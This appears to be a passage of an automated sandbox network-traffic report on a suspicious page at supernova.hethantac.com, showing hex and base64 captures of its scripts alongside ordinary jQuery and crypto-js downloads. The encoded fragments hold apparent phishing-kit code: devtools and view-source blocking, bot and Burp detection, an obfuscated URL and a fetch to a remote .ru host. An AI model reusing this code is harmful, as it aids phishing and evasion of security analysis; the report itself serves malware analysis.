                                                                                                                                          Data Ascii: fQ0KI2FZRmlrYkpNY2EuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTE3cHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ
                                                                                                                                          2024-11-18 05:47:23 UTC1369INData Raw: 43 41 67 49 43 41 67 5a 58 5a 6c 62 6e 51 75 63 48 4a 6c 64 6d 56 75 64 45 52 6c 5a 6d 46 31 62 48 51 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 47 5a 68 62 48 4e 6c 4f 77 30 4b 49 43 41 67 49 48 30 4e 43 67 30 4b 49 43 41 67 49 47 6c 6d 49 43 67 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 49 44 30 39 50 53 41 6e 56 53 63 70 49 48 78 38 49 43 38 76 49 45 4e 30 63 6d 77 67 4b 79 42 56 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6e 4e 6f 61 57 5a 30 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 53 41 39 50 54 30 67
                                                                                                                                          Data Ascii: CAgICAgZXZlbnQucHJldmVudERlZmF1bHQoKTsNCiAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgIH0NCg0KICAgIGlmICgNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQua2V5ID09PSAnVScpIHx8IC8vIEN0cmwgKyBVDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleSA9PT0g
                                                                                                                                          2024-11-18 05:47:23 UTC1369INData Raw: 6f 67 49 43 41 67 5a 58 5a 6c 62 6e 51 75 63 48 4a 6c 64 6d 56 75 64 45 52 6c 5a 6d 46 31 62 48 51 6f 4b 54 73 4e 43 69 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 70 39 4b 54 73 4e 43 69 68 6d 64 57 35 6a 64 47 6c 76 62 69 42 6b 5a 58 52 6c 59 33 52 45 5a 58 5a 55 62 32 39 73 63 79 67 70 49 48 73 4e 43 69 41 67 49 43 42 73 5a 58 51 67 5a 47 56 32 64 47 39 76 62 48 4e 50 63 47 56 75 49 44 30 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 59 32 39 75 63 33 51 67 64 47 68 79 5a 58 4e 6f 62 32 78 6b 49 44 30 67 4d 54 41 77 4f 79 41 76 4c 79 42 55 61 57 31 6c 49 47 52 6c 62 47 46 35 49 48 52 6f 63 6d 56 7a 61 47 39 73 5a 43 42 6d 62 33 49 67 5a 47 56 30 5a 57 4e 30 61 57 35 6e 49 47 52 6c 59 6e 56 6e 5a 32 56 79 44 51 6f 67 49
                                                                                                                                          Data Ascii: ogICAgZXZlbnQucHJldmVudERlZmF1bHQoKTsNCiAgICByZXR1cm4gZmFsc2U7DQp9KTsNCihmdW5jdGlvbiBkZXRlY3REZXZUb29scygpIHsNCiAgICBsZXQgZGV2dG9vbHNPcGVuID0gZmFsc2U7DQogICAgY29uc3QgdGhyZXNob2xkID0gMTAwOyAvLyBUaW1lIGRlbGF5IHRocmVzaG9sZCBmb3IgZGV0ZWN0aW5nIGRlYnVnZ2VyDQogI
                                                                                                                                          2024-11-18 05:47:23 UTC1369INData Raw: 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 77 59 57 64 6c 62 47 6c 75 61 79 49 67 62 6d 46 74 5a 54 30 69 63 47 46 6e 5a 57 78 70 62 6d 73 69 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 70 63 43 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 47 6c 77 49 69 42 32 59 57 78 31 5a 54 30 69 56 57 35 72 62 6d 39 33 62 69 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 48 4a 6c 5a 69 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 48 4a 6c 5a 69 49 67 64 6d 46 73 64 57 55 39 49 6d 68 30 64 48 41 36 4c 79 39 77 62 47 6c 74 62 57 56 79 64 47 39 75 4c 6d 39 79 5a 79 35 75 65 69
                                                                                                                                          Data Ascii: kZW4iIGlkPSJwYWdlbGluayIgbmFtZT0icGFnZWxpbmsiIHZhbHVlPSIiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGRpcCIgbmFtZT0iYmx0ZGlwIiB2YWx1ZT0iVW5rbm93biI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZHJlZiIgbmFtZT0iYmx0ZHJlZiIgdmFsdWU9Imh0dHA6Ly9wbGltbWVydG9uLm9yZy5uei
                                                                                                                                          2024-11-18 05:47:23 UTC1369INData Raw: 54 58 49 35 53 6d 68 7a 4d 44 4e 49 51 57 49 30 61 46 70 33 56 45 4d 75 59 6d 6c 79 63 32 4a 31 62 6d 67 75 63 6e 55 76 65 57 68 4d 55 46 42 49 55 58 68 61 5a 6c 68 72 52 45 46 49 57 46 42 47 64 46 64 69 51 32 46 46 52 30 5a 78 65 58 46 4d 56 55 78 58 52 45 56 49 51 31 6c 46 52 55 78 4a 55 56 70 53 54 6b 56 4f 55 6c 42 49 54 30 31 49 56 55 4a 42 4a 79 77 67 65 77 30 4b 49 43 41 67 49 47 31 6c 64 47 68 76 5a 44 6f 67 49 6b 64 46 56 43 49 73 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 48 4a 6c 63 33 42 76 62 6e 4e 6c 4c 6e 52 6c 65 48 51 6f 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 64 47 56 34 64 43 41 39 50 69 42 37 44 51 6f
                                                                                                                                          Data Ascii: TXI5SmhzMDNIQWI0aFp3VEMuYmlyc2J1bmgucnUveWhMUFBIUXhaZlhrREFIWFBGdFdiQ2FFR0ZxeXFMVUxXREVIQ1lFRUxJUVpSTkVOUlBIT01IVUJBJywgew0KICAgIG1ldGhvZDogIkdFVCIsDQogICAgfSkudGhlbihyZXNwb25zZSA9PiB7DQogICAgcmV0dXJuIHJlc3BvbnNlLnRleHQoKQ0KICAgIH0pLnRoZW4odGV4dCA9PiB7DQo
                                                                                                                                          2024-11-18 05:47:23 UTC1369INData Raw: 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 42 63 6c 6c 34 4c 6d 68 6c 64 47 68 68 62 6e 52 68 59 79 35 6a 62 32 30 76 4d 31 68 6b 57 6c 46 34 56 43 38 3d 22 29 29 3b 0d 0a 63 6f 6e 73 74 20 58 6f 42 48 59 48 6e 61 74 43 20 3d 20 4e 5a 64 4e 62 77 41 6b 52 49 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 6c 49 74 43 76 77 57 69 6e 77 20 3f 20 4e 5a 64 4e 62 77 41 6b 52 49 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 4e 5a 64 4e 62 77 41 6b 52 49 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 2f 2a 20 47 72 65 61 74 20 6c 65 61 64 65 72 73 20 69 6e 73 70 69 72 65 20 61 63 74 69 6f 6e 2e 20 2a 2f 0d 0a 69 66 28 58 6f 42 48 59 48 6e 61 74 43 20 3d 3d 20 6c 49 74 43 76 77 57 69 6e
                                                                                                                                          Data Ascii: (atob("aHR0cHM6Ly9Bcll4LmhldGhhbnRhYy5jb20vM1hkWlF4VC8="));const XoBHYHnatC = NZdNbwAkRI.hostname === lItCvwWinw ? NZdNbwAkRI.hostname : NZdNbwAkRI.hostname.split('.').slice(-2).join('.');/* Great leaders inspire action. */if(XoBHYHnatC == lItCvwWin
                                                                                                                                          2024-11-18 05:47:23 UTC1369INData Raw: 73 4e 43 69 41 67 62 33 5a 6c 63 6d 5a 73 62 33 63 36 49 47 68 70 5a 47 52 6c 62 6a 73 4e 43 6e 30 4e 43 69 4e 68 57 55 5a 70 61 32 4a 4b 54 57 4e 68 49 47 67 30 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 34 31 63 6d 56 74 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 32 46 5a 52 6d 6c 72 59 6b 70 4e 59 32 45 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 32 46 5a 52 6d 6c 72 59 6b 70 4e 59 32 45 67 61 44 52 37 5a
                                                                                                                                          Data Ascii: sNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNhWUZpa2JKTWNhIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI2FZRmlrYkpNY2EgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI2FZRmlrYkpNY2EgaDR7Z
                                                                                                                                          2024-11-18 05:47:23 UTC1369INData Raw: 67 50 48 4e 6a 63 6d 6c 77 64 44 34 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 62 6d 46 32 61 57 64 68 64 47 39 79 4c 6e 64 6c 59 6d 52 79 61 58 5a 6c 63 69 42 38 66 43 42 33 61 57 35 6b 62 33 63 75 59 32 46 73 62 46 42 6f 59 57 35 30 62 32 30 67 66 48 77 67 64 32 6c 75 5a 47 39 33 4c 6c 39 77 61 47 46 75 64 47 39 74 49 48 78 38 49 47 35 68 64 6d 6c 6e 59 58 52 76 63 69 35 31 63 32 56 79 51 57 64 6c 62 6e 51 75 61 57 35 6a 62 48 56 6b 5a 58 4d 6f 49 6b 4a 31 63 6e 41 69 4b 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57
                                                                                                                                          Data Ascii: gPHNjcmlwdD4NCiAgICBpZiAobmF2aWdhdG9yLndlYmRyaXZlciB8fCB3aW5kb3cuY2FsbFBoYW50b20gfHwgd2luZG93Ll9waGFudG9tIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.1655118151.101.130.1374436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:24 UTC629OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                          Host: code.jquery.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://supernova.hethantac.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:24 UTC610INHTTP/1.1 200 OK
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 89501
                                                                                                                                          Server: nginx
                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                          ETag: "28feccc0-15d9d"
                                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:24 GMT
                                                                                                                                          Age: 2925706
                                                                                                                                          X-Served-By: cache-lga21931-LGA, cache-dfw-kdal2120082-DFW
                                                                                                                                          X-Cache: HIT, HIT
                                                                                                                                          X-Cache-Hits: 2, 1
                                                                                                                                          X-Timer: S1731908845.502437,VS0,VE1
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          2024-11-18 05:47:24 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                          2024-11-18 05:47:24 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                          Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                          2024-11-18 05:47:24 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                          Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                          2024-11-18 05:47:24 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                          Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                          2024-11-18 05:47:24 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                          Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                          2024-11-18 05:47:24 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                          Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.1655120104.17.24.144436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:24 UTC657OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://supernova.hethantac.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:24 UTC968INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:24 GMT
                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                                                          ETag: W/"61182885-40eb"
                                                                                                                                          Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                          Age: 301882
                                                                                                                                          Expires: Sat, 08 Nov 2025 05:47:24 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sVBrf7mKiiNKuMpHI4pieikA7MMGpprcB2oFW%2BH%2FHB4I%2BkeC7nfUkdl%2Fkv3QwUvAnFCHMJTAVstoD9kdDunS%2FnzCHKATFyobCmgJiSTL2EAOW%2FbH7xRyLUg6tMUtxnHPg%2F%2FX3WFC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aa662f644798-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-18 05:47:24 UTC401INData Raw: 33 39 37 63 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                          Data Ascii: 397c!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
